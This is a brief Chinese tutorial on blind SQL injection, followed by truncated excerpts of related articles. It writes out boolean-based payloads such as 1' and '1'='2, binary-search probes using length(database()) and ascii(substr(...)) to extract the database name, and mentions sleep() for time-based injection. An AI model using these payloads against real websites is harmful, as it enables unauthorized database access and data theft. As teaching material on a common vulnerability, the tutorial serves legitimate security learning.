針對不回顯的sql注入,可以利用布林和延時注入來進行判斷
例如布林的判斷是否注入成功
1 and 1=2
1' and '1'='2
1" and "1"="2
1 當輸入1' and '1'='2顯示為假時,則說明注入成功;
2 接下來判斷字串長度
利用length()函式,通過二分法來判斷
id=1' and length(database())>10 --
id=1' and length(database())>5 --
3通過ascii碼的範圍,利用二分法來判斷每個字元的值,再轉換為英文
ascii() 函式 ascii碼範圍在0-127
id=1' and ascii(substr(database(),1,1))>64 --
大於64為真,則值再64字母<127 然後逐步來判斷ascii碼的值,最終確定字母
當沒有回顯時候,利用延時注入的函式判斷
sleep()
sql盲注特點 SQL盲注
盲注原理 盲注的分類 盲注常用函式 一 sql盲注概述 1.如果資料庫執行返回結果時只反饋對錯不會返回資料庫中的資訊 此時可以採用邏輯判斷是否正確的盲注來獲取資訊。2.盲注是不能通過直接顯示的途徑來獲取資料庫資料的方法。在盲注中,攻擊者根據其返回頁面的不同來判斷資訊 可能是頁面內容的不同,也可以是響...
SQL盲注 時間盲注,dnslog盲注
時間盲注原理 id get id sql select from users where id id limit 0,1 result mysql query sql row mysql fetch array result if row else 存在sql注入漏洞 然而頁面不會回顯資料,也不會回...
SQL簡明例項教程
create table customer id int 11 not null auto increment,lastname char 50 default null,firstname char 50 default null,address char 50 default null,city...